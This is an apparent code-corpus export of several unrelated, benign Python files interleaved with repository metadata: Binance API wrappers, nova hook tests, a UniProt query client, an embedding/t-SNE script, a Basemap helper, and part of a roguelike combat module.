factors.append(primes[i])
n = n / primes[i]
return factors
if __name__ == '__main__':
number = 600851475143
print(largest_prime_factor_naive(number))
print(largest_prime_factor_even_optimized(number))
print(largest_prime_factor_square_optimized(number))
number = 600851475143
primes = idx_sieve(20000)
print(max(prime_factor(number, primes)))
| 28.516393
| 122
| 0.603334
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1,163
| 0.334291
|
0b61cadfab29026982ee72c19310998fdc907aa6
| 1,312
|
py
|
Python
|
aio_binance/futures/usdt/api/methods/stream.py
|
GRinvest/aiobinance
|
49ce0bdf955d9fa9363c41eb9cec3da2f121e611
|
[
"MIT"
] | 5
|
2022-01-30T19:32:16.000Z
|
2022-03-12T15:00:13.000Z
|
aio_binance/futures/usdt/api/methods/stream.py
|
GRinvest/aio-binance-library
|
49ce0bdf955d9fa9363c41eb9cec3da2f121e611
|
[
"MIT"
] | null | null | null |
aio_binance/futures/usdt/api/methods/stream.py
|
GRinvest/aio-binance-library
|
49ce0bdf955d9fa9363c41eb9cec3da2f121e611
|
[
"MIT"
] | null | null | null |
class DataStream:
async def create_private_listen_key(self) -> dict:
"""**Create a ListenKey (USER_STREAM)**
Notes:
``POST /fapi/v1/listenKey``
See Also:
https://binance-docs.github.io/apidocs/futures/en/#start-user-data-stream-user_stream
"""
return await self._fetch(
'POST',
'create_private_listen_key',
'/fapi/v1/listenKey'
)
async def update_private_listen_key(self) -> dict:
"""**Ping/Keep-alive a ListenKey (USER_STREAM)**
Notes:
``PUT /fapi/v1/listenKey``
See Also:
https://binance-docs.github.io/apidocs/futures/en/#keepalive-user-data-stream-user_stream
"""
return await self._fetch(
'PUT',
'update_private_listen_key',
'/fapi/v1/listenKey'
)
async def delete_private_listen_key(self) -> dict:
"""**Close a ListenKey (USER_STREAM)**
Notes:
``DELETE /fapi/v1/listenKey``
See Also:
https://binance-docs.github.io/apidocs/futures/en/#close-user-data-stream-user_stream
"""
return await self._fetch(
'DELETE',
'delete_private_listen_key',
'/fapi/v1/listenKey'
)
| 29.155556
| 101
| 0.55564
| 1,310
| 0.998476
| 0
| 0
| 0
| 0
| 1,275
| 0.971799
| 843
| 0.64253
|
0b61d6924578e04d8bbfa01176c73eece0bd32ef
| 2,484
|
py
|
Python
|
nova/tests/test_hooks.py
|
bopopescu/zknova
|
8dd09199f5678697be228ffceeaf2c16f6d7319d
|
[
"Apache-2.0"
] | null | null | null |
nova/tests/test_hooks.py
|
bopopescu/zknova
|
8dd09199f5678697be228ffceeaf2c16f6d7319d
|
[
"Apache-2.0"
] | null | null | null |
nova/tests/test_hooks.py
|
bopopescu/zknova
|
8dd09199f5678697be228ffceeaf2c16f6d7319d
|
[
"Apache-2.0"
] | 1
|
2020-07-24T08:25:25.000Z
|
2020-07-24T08:25:25.000Z
|
# vim: tabstop=4 shiftwidth=4 softtabstop=4
# Copyright (c) 2012 OpenStack, LLC.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""Tests for hook customization."""
import stevedore
from nova import hooks
from nova import test
class SampleHookA(object):
name = "a"
def _add_called(self, op, kwargs):
called = kwargs.get('called', None)
if called is not None:
called.append(op + self.name)
def pre(self, *args, **kwargs):
self._add_called("pre", kwargs)
class SampleHookB(SampleHookA):
name = "b"
def post(self, rv, *args, **kwargs):
self._add_called("post", kwargs)
class MockEntryPoint(object):
def __init__(self, cls):
self.cls = cls
def load(self):
return self.cls
class HookTestCase(test.TestCase):
def _mock_load_plugins(self, iload, iargs, ikwargs):
return [
stevedore.extension.Extension('test_hook',
MockEntryPoint(SampleHookA), SampleHookA, SampleHookA()),
stevedore.extension.Extension('test_hook',
MockEntryPoint(SampleHookB), SampleHookB, SampleHookB()),
]
def setUp(self):
super(HookTestCase, self).setUp()
hooks.reset()
self.stubs.Set(stevedore.extension.ExtensionManager, '_load_plugins',
self._mock_load_plugins)
@hooks.add_hook('test_hook')
def _hooked(self, a, b=1, c=2, called=None):
return 42
def test_basic(self):
self.assertEqual(42, self._hooked(1))
mgr = hooks._HOOKS['test_hook']
self.assertEqual(2, len(mgr.extensions))
self.assertEqual(SampleHookA, mgr.extensions[0].plugin)
self.assertEqual(SampleHookB, mgr.extensions[1].plugin)
def test_order_of_execution(self):
called_order = []
self._hooked(42, called=called_order)
self.assertEqual(['prea', 'preb', 'postb'], called_order)
| 28.227273
| 78
| 0.654187
| 1,692
| 0.681159
| 0
| 0
| 95
| 0.038245
| 0
| 0
| 801
| 0.322464
|
0b6439e111fde6d2d72ca7b4f1a3a62557d36d00
| 8,850
|
py
|
Python
|
code/reasoningtool/kg-construction/QueryUniprot.py
|
andrewsu/RTX
|
dd1de262d0817f7e6d2f64e5bec7d5009a3a2740
|
[
"MIT"
] | 31
|
2018-03-05T20:01:10.000Z
|
2022-02-01T03:31:22.000Z
|
code/reasoningtool/kg-construction/QueryUniprot.py
|
andrewsu/RTX
|
dd1de262d0817f7e6d2f64e5bec7d5009a3a2740
|
[
"MIT"
] | 1,774
|
2018-03-06T01:55:03.000Z
|
2022-03-31T03:09:04.000Z
|
code/reasoningtool/kg-construction/QueryUniprot.py
|
andrewsu/RTX
|
dd1de262d0817f7e6d2f64e5bec7d5009a3a2740
|
[
"MIT"
] | 19
|
2018-05-10T00:43:19.000Z
|
2022-03-08T19:26:16.000Z
|
""" This module defines the class QueryUniprot which connects to APIs at
http://www.uniprot.org/uploadlists/, querying reactome pathways from uniprot id.
* map_enzyme_commission_id_to_uniprot_ids(ec_id)
Description:
map enzyme commission id to UniProt ids
Args:
ec_id (str): enzyme commission id, e.g., "ec:1.4.1.17"
Returns:
ids (set): a set of the enzyme commission ids, or empty set if no UniProt id can be obtained or the response
status code is not 200.
"""
__author__ = ""
__copyright__ = ""
__credits__ = []
__license__ = ""
__version__ = ""
__maintainer__ = ""
__email__ = ""
__status__ = "Prototype"
# import requests
# import requests_cache
from cache_control_helper import CacheControlHelper
import CachedMethods
import sys
import urllib.parse
import xmltodict
class QueryUniprot:
API_BASE_URL = "http://www.uniprot.org/uploadlists/"
TIMEOUT_SEC = 120
HANDLER_MAP = {
'map_enzyme_commission_id_to_uniprot_ids': 'uniprot/?query=({id})&format=tab&columns=id',
'get_protein': 'uniprot/{id}.xml'
}
@staticmethod
@CachedMethods.register
def uniprot_id_to_reactome_pathways(uniprot_id):
"""returns a ``set`` of reactome IDs of pathways associated with a given string uniprot ID
:param uniprot_id: a ``str`` uniprot ID, like ``"P68871"``
:returns: a ``set`` of string Reactome IDs
"""
payload = { 'from': 'ACC',
'to': 'REACTOME_ID',
'format': 'tab',
'query': uniprot_id }
contact = "stephen.ramsey@oregonstate.edu"
header = {'User-Agent': 'Python %s' % contact}
requests = CacheControlHelper()
try:
url =QueryUniprot.API_BASE_URL
res = requests.post(QueryUniprot.API_BASE_URL, data=payload, headers=header)
except requests.exceptions.Timeout:
print(url, file=sys.stderr)
print('Timeout in QueryUniprot for URL: ' + QueryUniprot.API_BASE_URL, file=sys.stderr)
return None
except KeyboardInterrupt:
sys.exit(0)
except BaseException as e:
print(url, file=sys.stderr)
print('%s received in QueryUniprot for URL: %s' % (e, url), file=sys.stderr)
return None
status_code = res.status_code
if status_code != 200:
print(QueryUniprot.API_BASE_URL, file=sys.stderr)
print('Status code ' + str(status_code) + ' for url: ' + QueryUniprot.API_BASE_URL, file=sys.stderr)
return None
# assert 200 == res.status_code
res_set = set()
for line in res.text.splitlines():
field_str = line.split("\t")[1]
if field_str != "To":
res_set.add(field_str)
return res_set
@staticmethod
def __access_api(handler):
api_base_url = 'http://www.uniprot.org'
url = api_base_url + '/' + handler
#print(url)
contact = "stephen.ramsey@oregonstate.edu"
header = {'User-Agent': 'Python %s' % contact}
requests = CacheControlHelper()
try:
res = requests.get(url, timeout=QueryUniprot.TIMEOUT_SEC, headers=header)
except requests.exceptions.Timeout:
print(url, file=sys.stderr)
print('Timeout in QueryUniprot for URL: ' + url, file=sys.stderr)
return None
except requests.exceptions.ChunkedEncodingError:
print(url, file=sys.stderr)
print('ChunkedEncodingError for URL: ' + url, file=sys.stderr)
return None
except BaseException as e:
print(url, file=sys.stderr)
print('%s received in QueryUniprot for URL: %s' % (e, url), file=sys.stderr)
return None
status_code = res.status_code
if status_code != 200:
print(url, file=sys.stderr)
print('Status code ' + str(status_code) + ' for url: ' + url, file=sys.stderr)
return None
return res.text
@staticmethod
def map_enzyme_commission_id_to_uniprot_ids(ec_id):
res_set = set()
if not isinstance(ec_id, str):
return res_set
ec_id_encoded = urllib.parse.quote_plus(ec_id)
handler = QueryUniprot.HANDLER_MAP['map_enzyme_commission_id_to_uniprot_ids'].format(id=ec_id_encoded)
res = QueryUniprot.__access_api(handler)
if res is not None:
res = res[res.find('\n')+1:]
for line in res.splitlines():
res_set.add(line)
return res_set
@staticmethod
def __get_entity(entity_type, entity_id):
if entity_id[:10] == 'UniProtKB:':
entity_id = entity_id[10:]
handler = QueryUniprot.HANDLER_MAP[entity_type].format(id=entity_id)
results = QueryUniprot.__access_api(handler)
entity = None
if results is not None:
obj = xmltodict.parse(results)
if 'uniprot' in obj.keys():
if 'entry' in obj['uniprot'].keys():
entity = obj['uniprot']['entry']
return entity
@staticmethod
def get_protein_gene_symbol(entity_id):
ret_symbol = "None"
if not isinstance(entity_id, str):
return ret_symbol
entity_obj = QueryUniprot.__get_entity("get_protein", entity_id)
if entity_obj is not None:
if 'gene' in entity_obj.keys():
if "name" in entity_obj["gene"].keys():
gene_name_obj = entity_obj["gene"]["name"]
if not type(gene_name_obj) == list:
gene_name_obj = [gene_name_obj]
for name_dict in gene_name_obj:
# print(name_dict)
if "primary" in name_dict.values() and "#text" in name_dict.keys():
ret_symbol = name_dict["#text"]
return ret_symbol
@staticmethod
def __get_name(entity_type, entity_id):
entity_obj = QueryUniprot.__get_entity(entity_type, entity_id)
name = "UNKNOWN"
if entity_obj is not None:
if 'protein' in entity_obj.keys():
if 'recommendedName' in entity_obj['protein'].keys():
if 'fullName' in entity_obj['protein']['recommendedName'].keys():
name = entity_obj['protein']['recommendedName']['fullName']
if isinstance(name, dict):
name = name['#text']
return name
@staticmethod
def get_protein_name(protein_id):
if not isinstance(protein_id, str):
return "UNKNOWN"
return QueryUniprot.__get_name("get_protein", protein_id)
@staticmethod
def get_citeable_accession_for_accession(accession_number):
res_acc = None
res_tab = QueryUniprot.__access_api("uniprot/" + accession_number + ".tab")
if res_tab is None:
return res_acc
res_lines = res_tab.splitlines()
if len(res_lines) > 1:
res_acc = res_lines[1].split("\t")[0]
return res_acc
if __name__ == '__main__':
print(QueryUniprot.get_citeable_accession_for_accession("P35354"))
print(QueryUniprot.get_citeable_accession_for_accession("A8K802"))
print(QueryUniprot.get_citeable_accession_for_accession("Q16876"))
# print(QueryUniprot.uniprot_id_to_reactome_pathways("P68871"))
# print(QueryUniprot.uniprot_id_to_reactome_pathways("Q16621"))
# print(QueryUniprot.uniprot_id_to_reactome_pathways("P09601"))
print(CachedMethods.cache_info())
print(QueryUniprot.map_enzyme_commission_id_to_uniprot_ids("ec:1.4.1.17")) # small results
print(QueryUniprot.map_enzyme_commission_id_to_uniprot_ids("ec:1.3.1.110")) # empty result
print(QueryUniprot.map_enzyme_commission_id_to_uniprot_ids("ec:1.2.1.22")) # large results
print(QueryUniprot.map_enzyme_commission_id_to_uniprot_ids("ec:4.4.1.xx")) # fake id
print(QueryUniprot.map_enzyme_commission_id_to_uniprot_ids("R-HSA-1912422")) # wrong id
print(QueryUniprot.get_protein_gene_symbol('UniProtKB:P20848'))
print(QueryUniprot.get_protein_gene_symbol("UniProtKB:P01358"))
print(QueryUniprot.get_protein_gene_symbol("UniProtKB:Q96P88"))
print(QueryUniprot.get_protein_name('UniProtKB:P01358'))
print(QueryUniprot.get_protein_name('UniProtKB:P20848'))
print(QueryUniprot.get_protein_name('UniProtKB:Q9Y471'))
print(QueryUniprot.get_protein_name('UniProtKB:O60397'))
print(QueryUniprot.get_protein_name('UniProtKB:Q8IZJ3'))
print(QueryUniprot.get_protein_name('UniProtKB:Q7Z2Y8'))
print(QueryUniprot.get_protein_name('UniProtKB:Q8IWN7'))
print(QueryUniprot.get_protein_name('UniProtKB:Q156A1'))
| 40.410959
| 116
| 0.63209
| 6,364
| 0.719096
| 0
| 0
| 6,052
| 0.683842
| 0
| 0
| 2,369
| 0.267684
|
0b649e46fb5914bfe7b320bbcd19fe8e80f42ef7
| 1,624
|
py
|
Python
|
code_trunk/emb.py
|
chris4540/DD2430-ds-proj
|
b876efabe949392b27a7ebd4afb2be623174e287
|
[
"MIT"
] | null | null | null |
code_trunk/emb.py
|
chris4540/DD2430-ds-proj
|
b876efabe949392b27a7ebd4afb2be623174e287
|
[
"MIT"
] | null | null | null |
code_trunk/emb.py
|
chris4540/DD2430-ds-proj
|
b876efabe949392b27a7ebd4afb2be623174e287
|
[
"MIT"
] | null | null | null |
import torch
from network.siamese import SiameseNet
from network.resnet import ResidualEmbNetwork
import os
import numpy as np
from utils.datasets import DeepFashionDataset
from torchvision.transforms import Compose
from torchvision.transforms import Resize
from torchvision.transforms import ToTensor
from torchvision.transforms import Normalize
from torch.utils.data import Subset
from torch.utils.data import DataLoader
from utils import extract_embeddings
import pickle
from cuml.manifold import TSNE
emb_net = ResidualEmbNetwork()
model = SiameseNet(emb_net)
trans = Compose(
[
Resize((224, 224)),
ToTensor(),
Normalize([0.7511, 0.7189, 0.7069], [0.2554, 0.2679, 0.2715]),
])
model.load_state_dict(torch.load('siamese_resnet18.pth'))
deep_fashion_root_dir = "./deepfashion_data"
train_ds = DeepFashionDataset(
deep_fashion_root_dir, 'train', transform=trans)
emb_net = model.emb_net
emb_net.cuda()
# subset
n_samples = 25000
sel_idx = np.random.choice(
list(range(len(train_ds))),
n_samples, replace=False)
assert len(set(sel_idx)) == n_samples
ds = Subset(train_ds, sel_idx)
loader = DataLoader(
ds, batch_size=100, pin_memory=True, num_workers=os.cpu_count())
print("extracting...")
embeddings, labels = extract_embeddings(emb_net, loader)
tsne = TSNE(n_iter=400, metric="euclidean")
projected_emb = tsne.fit_transform(embeddings)
with open('projected_emb.pkl', 'wb') as handle:
pickle.dump(projected_emb, handle, protocol=pickle.HIGHEST_PROTOCOL)
with open('labels.pkl', 'wb') as handle:
pickle.dump(labels, handle, protocol=pickle.HIGHEST_PROTOCOL)
| 28.491228
| 72
| 0.76601
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 122
| 0.075123
|
0b67517486e91d69f9ba0a1be6a90a8c7366f494
| 507
|
py
|
Python
|
src/stations/datastructures.py
|
cwerner/st-folium-demo
|
31bfc3184e7e90d1901ab48fd0d4ee6026f97fe6
|
[
"Apache-2.0"
] | 1
|
2021-03-19T11:10:04.000Z
|
2021-03-19T11:10:04.000Z
|
src/stations/datastructures.py
|
cwerner/st-folium-demo
|
31bfc3184e7e90d1901ab48fd0d4ee6026f97fe6
|
[
"Apache-2.0"
] | null | null | null |
src/stations/datastructures.py
|
cwerner/st-folium-demo
|
31bfc3184e7e90d1901ab48fd0d4ee6026f97fe6
|
[
"Apache-2.0"
] | null | null | null |
from enum import Enum
# ifu
ifu = {"name": "IFU", "geo_lat": 47.476180, "geo_lon": 11.063350}
# tereno stations
tereno_stations = [
{"name": "Fendth", "geo_lat": 47.83243, "geo_lon": 11.06111},
{"name": "Grasswang", "geo_lat": 47.57026, "geo_lon": 11.03189},
{"name": "Rottenbuch", "geo_lat": 47.73032, "geo_lon": 11.03189},
]
class RES(Enum):
TENMIN = "10_minutes"
HOURLY = "hourly"
DAILY = "daily"
@staticmethod
def names():
return list(map(lambda c: c, RES))
| 23.045455
| 69
| 0.601578
| 163
| 0.321499
| 0
| 0
| 73
| 0.143984
| 0
| 0
| 181
| 0.357002
|
0b6861770f6d11f0e6e5144b7f72620064b17922
| 2,217
|
py
|
Python
|
Tools/Scripts/Python/module_Basemap_RegCM_domain.py
|
taobrienlbl/RegCM
|
bda1c78790f0a1501916d0979b843216a08b2cef
|
[
"AFL-1.1"
] | 27
|
2019-04-23T08:36:25.000Z
|
2021-11-15T08:55:01.000Z
|
Tools/Scripts/Python/module_Basemap_RegCM_domain.py
|
taobrienlbl/RegCM
|
bda1c78790f0a1501916d0979b843216a08b2cef
|
[
"AFL-1.1"
] | 9
|
2020-02-20T06:43:03.000Z
|
2021-09-24T11:26:46.000Z
|
Tools/Scripts/Python/module_Basemap_RegCM_domain.py
|
taobrienlbl/RegCM
|
bda1c78790f0a1501916d0979b843216a08b2cef
|
[
"AFL-1.1"
] | 17
|
2019-06-10T12:49:05.000Z
|
2021-11-14T06:55:20.000Z
|
#!/usr/bin/python2.6
""" Here a comment starts, with 3 quotation marks. In the same way, the comment ends ...
Purpose: Draw a base map of the CORDEX domain
Selected projection: Lambert Conformal Projection
Date: Sept. 26, 2018
Author: S. STRADA
REFERENCES:
Basemap Tool
http://basemaptutorial.readthedocs.org/en/latest/index.html
https://matplotlib.org/basemap/
"""
######################################################
# Import modules you need
#-----------------------------------------------------
from mpl_toolkits.basemap import Basemap, cm
import matplotlib.pyplot as plt
import numpy as np
######################################################
### Python fuction to build a map using a specific projection
#-----------------------------------------------------
def map_RegCMdomain(ax, lat_start, lat_end, lon_start, lon_end, lon0, lat0, fontsize, dparall, dmerid):
"""
How to call the function in a script to create a basemap object :
1. Import function to create the domain
from module_RegCM_domain import basemap_RegCMdomain
2. Call the function and pass to it all needed variables
map = map_RegCMdomain(ax, lat_start, lat_end, lon_start, lon_end, lon_end, lon_0, lat0, fontsize))
Setup Miller Cyclindrical Projection
--> llcrnrlat,llcrnrlon,urcrnrlat,urcrnrlon are the lat/lon values of the lower left and upper right corners of the map
--> resolution = 'i' means intermediate coastline resolution
--> area_thresh=1000 means don't plot coastline features less than 1000 km^2 in area (pay attention to this if you need to plot small islands!)
"""
m = Basemap(ax=ax, llcrnrlon=lon_start, llcrnrlat=lat_start, urcrnrlon=lon_end, urcrnrlat=lat_end,
resolution='i', area_thresh=1000., projection='mill', lon_0=lon0, lat_0=lat0, lat_ts=0)
m.drawcoastlines(color='k',linewidth=1, zorder=10)
m.drawcountries(color='k',linewidth=0.5, zorder=11)
m.drawparallels(range(-90, 90, dparall), labels=[1,0,0,0], fontsize=fontsize, dashes=[1, 2],linewidth=1, color='k', zorder=12)
m.drawmeridians(range(-180, 180, dmerid),labels=[0,0,0,1], fontsize=fontsize, dashes=[1, 2],linewidth=1, color='k', zorder=12)
return m
| 41.830189
| 145
| 0.656292
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1,424
| 0.642309
|
0b691cc681e4265eeba5b9e50b719f23cdd77315
| 24,369
|
py
|
Python
|
old_game/combat.py
|
jwvhewitt/dmeternal
|
bb09f2d497daf9b40dd8cfee10c55be55fb7c3cb
|
[
"Apache-2.0"
] | 53
|
2015-07-03T21:25:36.000Z
|
2022-02-18T23:08:38.000Z
|
old_game/combat.py
|
jwvhewitt/dmeternal
|
bb09f2d497daf9b40dd8cfee10c55be55fb7c3cb
|
[
"Apache-2.0"
] | 5
|
2015-07-03T21:27:12.000Z
|
2016-12-08T14:40:38.000Z
|
old_game/combat.py
|
jwvhewitt/dmeternal
|
bb09f2d497daf9b40dd8cfee10c55be55fb7c3cb
|
[
"Apache-2.0"
] | 14
|
2016-02-02T06:49:51.000Z
|
2022-02-24T13:24:35.000Z
|
from . import characters
from . import teams
from . import hotmaps
from . import pygwrap
import pygame
from . import maps
import collections
from . import image
from . import pfov
import random
from . import stats
from . import rpgmenu
from . import animobs
from . import effects
from . import enchantments
from . import aibrain
from . import services
class TacticsRedraw( object ):
def __init__( self, chara, comba, explo, hmap = None ):
self.chara = chara
self.comba = comba
self.explo = explo
self.hmap = hmap
self.rect = pygame.Rect( 32, 32, 300, 15 )
self.gems = image.Image( "sys_counters.png", 10, 16 )
def __call__( self, screen ):
self.explo.view( screen )
pygwrap.default_border.render( screen, self.rect )
pygwrap.draw_text( screen, pygwrap.SMALLFONT, str( self.chara ), self.rect )
ap = min( self.chara.get_move() - self.comba.ap_spent[ self.chara ], 24 )
if self.hmap and self.comba.scene.on_the_map( *self.explo.view.mouse_tile ):
apr = ap - self.hmap.map[self.explo.view.mouse_tile[0]][self.explo.view.mouse_tile[1]]
else:
apr = ap
if ap > 0:
mydest = pygame.Rect( self.rect.x + 180, self.rect.y, 32, 32 )
pygwrap.draw_text( screen, pygwrap.ITALICFONT, "AP:", mydest )
for t in range( 1, (ap+3)//2 ):
mydest.x = self.rect.x + 198 + t * 8
if t <= ( apr + 1 ) //2:
if apr >= t * 2:
self.gems.render( screen, mydest, 1 )
else:
self.gems.render( screen, mydest, 6 )
else:
self.gems.render( screen, mydest, 5 )
class CombatStat( object ):
"""Keep track of some stats that only matter during combat."""
def __init__( self ):
self.paralysis = 0
self.confusion = 0
self.asleep = False
self.silent = False
self.aoo_readied = False
self.attacks_so_far = 0
def can_act( self ):
return self.paralysis < 1 and not self.asleep
# This is a complex effect- Check if target is undead. If so, first apply an
# enchantment. Then, make skill roll to cause 20-120 solar damage and paralysis.
# If that skill roll fails, make an easier skill roll to just cause paralysis.
HOLY_SIGN_EFFECT = effects.TargetIs( effects.UNDEAD, on_true = ( \
effects.Enchant(enchantments.HolySignMark,anim=animobs.YellowSparkle,children=( \
effects.OpposedRoll(stats.HOLY_SIGN, stats.CHARISMA, -70, stats.MAGIC_DEFENSE, stats.PIETY, on_success = (
effects.HealthDamage( (20,6,0), stats.PIETY, element=stats.RESIST_SOLAR, anim=animobs.YellowExplosion, on_success= (effects.Paralyze(max_duration=6),) )
,), on_failure = (
effects.OpposedRoll(stats.HOLY_SIGN, stats.CHARISMA, 5, stats.MAGIC_DEFENSE, stats.PIETY, on_success = (
effects.Paralyze(max_duration=8)
# Is there an obfuscated Python competition?
,)),)),)),))
class Combat( object ):
def __init__( self, camp, monster_zero ):
self.active = []
self.scene = camp.scene
self.camp = camp
self.ap_spent = collections.defaultdict( int )
self.cstat = collections.defaultdict( CombatStat )
self.no_quit = True
self.activate_monster( monster_zero )
# Sort based on initiative roll.
self.active.sort( key = characters.roll_initiative, reverse=True )
def activate_monster( self, monster_zero ):
for m in self.scene.contents:
if isinstance( m, characters.Character ) and m.is_alright() and m not in self.active:
if m in self.camp.party:
self.active.append( m )
elif self.scene.distance( m.pos, monster_zero.pos ) < 5:
self.active.append( m )
elif m.team and m.team == monster_zero.team:
self.active.append( m )
def num_enemies( self ):
"""Return the number of active, hostile characters."""
n = 0
for m in self.active:
if isinstance( m, characters.Character ) and m.is_alright() and m.is_hostile( self.camp ):
n += 1
return n
def can_act( self, chara ):
"""Return True if the provided character can act right now."""
return chara.is_alright() and self.ap_spent[ chara ] < chara.get_move() and self.cstat[chara].can_act()
def still_fighting( self ):
"""Keep playing as long as there are enemies, players, and no quit."""
return self.num_enemies() and self.camp.first_living_pc() and self.no_quit and not pygwrap.GOT_QUIT and not self.camp.destination
def get_threatened_area( self, chara ):
area = set()
for m in self.active:
if m.is_alright() and m.is_enemy( self.camp, chara ) and m.can_attack_of_opportunity() and self.cstat[m].aoo_readied and self.cstat[m].can_act():
x,y = m.pos
for d in self.scene.DELTA8:
area.add( (x + d[0], y + d[1] ) )
return area
def opportunity_to_attack( self, explo, target ):
"""Enemies with attacks of opportunity can attack this target."""
for m in self.active[:]:
if m.is_alright() and m.is_enemy( self.camp, target ) and m.can_attack_of_opportunity() and self.cstat[m].aoo_readied and self.cstat[m].can_act() and self.scene.distance(m.pos,target.pos) <= 1:
self.attack( explo, m, target, attack_of_opportunity=True )
self.cstat[m].aoo_readied = False
# If the target is killed, everyone else can stop piling on.
if not target.is_alright():
break
def step( self, explo, chara, hmap, do_bump=False ):
"""Move chara according to hmap, return True if movement ended."""
# See if the movement starts in a threatened area- may be attacked if it ends
# in a threatened area as well.
threat_area = self.get_threatened_area( chara )
started_in_threat = chara.pos in threat_area
best_d = hmap.clever_downhill_dir( explo, chara.pos )
if best_d:
x2 = best_d[0] + chara.pos[0]
y2 = best_d[1] + chara.pos[1]
target = self.scene.get_character_at_spot( (x2,y2) )
if explo.scene.map[x2][y2].blocks_walking():
if do_bump:
explo.bump_tile( (x2,y2), chara )
self.end_turn( chara )
return True
elif not target:
# Move the character.
chara.pos = (x2,y2)
self.ap_spent[ chara ] += 1 + abs(best_d[0]) + abs(best_d[1])
# Suffer any field effects.
fld = self.scene.get_field_at_spot( chara.pos )
if fld:
fld.invoke( explo )
# Maybe take an attack of opportunity.
if chara.is_alright() and started_in_threat and chara.pos in threat_area and not chara.hidden:
self.opportunity_to_attack( explo, chara )
return False
else:
return target
else:
return True
def move_player_to_spot( self, explo, chara, pos, redraw=None ):
result = None
if not redraw:
redraw = explo.view
explo.view.overlays.clear()
if self.scene.on_the_map( *pos ):
hmap = hotmaps.PointMap( self.scene, pos, avoid_models=True )
while self.ap_spent[ chara ] < chara.get_move():
result = self.step( explo, chara, hmap, do_bump=True )
self.scene.update_party_position( explo.camp.party )
if result:
break
redraw( explo.screen )
pygame.display.flip()
pygwrap.anim_delay()
return result
def attack( self, explo, chara, target, redraw=None, attack_of_opportunity=False ):
"""Perform chara's attack against target."""
# Determine number of attacks. If have moved one step or less, can make full attack.
if attack_of_opportunity:
# One attack at a +0 modifier
num_attacks = [0]
elif self.ap_spent[chara] <= 3:
num_attacks = chara.series_of_attacks()
else:
# One attack at a +0 modifier
num_attacks = [0]
for a in num_attacks:
if chara.can_attack() and target.is_alright():
# The attack modifier is based on whether this is the character's
# first, second, etc attack and also if the target is being ganged
# up on.
at_fx = chara.get_attack_effect( roll_mod = a + self.cstat[target].attacks_so_far * 5 )
at_anim = chara.get_attack_shot_anim()
if at_anim:
opening_shot = at_anim( chara.pos, target.pos )
else:
opening_shot = None
explo.invoke_effect( at_fx, chara, (target.pos,), opening_shot )
chara.spend_attack_price()
# A hidden character will likely be revealed if the target survived.
if target.is_alright() and chara.hidden and random.randint(1,100) + target.get_stat(stats.AWARENESS) + target.get_stat_bonus(stats.INTELLIGENCE) > chara.get_stat(stats.STEALTH) + chara.get_stat_bonus(stats.REFLEXES):
chara.hidden = False
# Record the fact that this target has been attacked.
self.cstat[target].attacks_so_far += 1
else:
break
if ( target.is_alright() and target.can_attack_of_opportunity() and self.cstat[target].can_act()
and self.scene.distance(target.pos,chara.pos) <= target.get_attack_reach() and not attack_of_opportunity ):
# Target may be able to counterattack.
if random.randint(1,100) <= min( target.get_stat( stats.COUNTER_ATTACK ), 95 ):
self.attack( explo, target, chara, redraw, True )
if not attack_of_opportunity:
self.end_turn( chara )
def move_to_attack( self, explo, chara, target, redraw=None ):
result = None
if not redraw:
redraw = explo.view
explo.view.overlays.clear()
if self.scene.on_the_map( *target.pos ):
attack_positions = pfov.AttackReach( self.scene, target.pos[0], target.pos[1], chara.get_attack_reach() ).tiles
# Remove the positions of models from the goal tiles, so they will be avoided.
for m in self.scene.contents:
if self.scene.is_model(m) and m.pos in attack_positions and m is not chara:
attack_positions.remove( m.pos )
hmap = hotmaps.HotMap( self.scene, attack_positions, avoid_models=True )
while self.ap_spent[ chara ] < chara.get_move():
result = self.step( explo, chara, hmap )
if chara in self.camp.party:
self.scene.update_party_position( explo.camp.party )
if result:
break
redraw( explo.screen )
pygame.display.flip()
pygwrap.anim_delay()
if chara.pos in attack_positions:
# Close enough to attack. Make it so.
self.attack( explo, chara, target, redraw )
return result
def end_turn( self, chara ):
"""End this character's turn."""
self.ap_spent[ chara ] += chara.get_move()
def attempt_stealth( self, explo, chara ):
"""Make a stealth roll for chara vs best enemy awareness roll."""
# Determine the highest awareness of all enemies.
hi = 0
for m in self.active:
if m.is_alright() and m.is_enemy( self.camp, chara ):
awareness = m.get_stat( stats.AWARENESS ) + m.get_stat_bonus( stats.INTELLIGENCE )
hi = max( hi, awareness )
# The target number is clamped between 5 and 96- always 5% chance of success or failure.
hi = min( max( hi - chara.get_stat( stats.STEALTH ) - chara.get_stat_bonus( stats.REFLEXES ) + 45 , 5 ), 96 )
anims = list()
if random.randint(1,100) >= hi:
chara.hidden = True
anims.append( animobs.Smoke( pos=chara.pos ) )
else:
anims.append( animobs.Smoke( pos=chara.pos ) )
anims.append( animobs.Caption( "Fail!", pos=chara.pos ) )
animobs.handle_anim_sequence( explo.screen, explo.view, anims )
self.end_turn( chara )
def attempt_awareness( self, explo, chara ):
"""Try to spot any hidden models taking part in combat."""
awareness = chara.get_stat( stats.AWARENESS ) + chara.get_stat_bonus( stats.INTELLIGENCE ) + 55
anims = list()
for m in self.active:
if m.is_alright() and m.is_enemy( self.camp, chara ) and m.hidden:
spot_chance = max( awareness - m.get_stat( stats.STEALTH ) - chara.get_stat_bonus( stats.REFLEXES ), 10)
if random.randint(1,100) <= spot_chance:
m.hidden = False
anims.append( animobs.PurpleSparkle( pos=m.pos ) )
if not anims:
anims.append( animobs.Caption( "Fail!", pos=chara.pos ) )
animobs.handle_anim_sequence( explo.screen, explo.view, anims )
self.end_turn( chara )
def attempt_holy_sign( self, explo, chara ):
"""Attempt to disrupt the undead creatures in the area."""
aoe = pfov.PointOfView(self.scene, chara.pos[0], chara.pos[1], 16).tiles
explo.invoke_effect( HOLY_SIGN_EFFECT, chara, aoe, animobs.Marquee(chara.pos) )
chara.holy_signs_used += 1
self.end_turn( chara )
def num_enemies_hiding( self, chara ):
n = 0
for m in self.active:
if m.is_alright() and m.is_enemy( self.camp, chara ) and m.hidden:
n += 1
return n
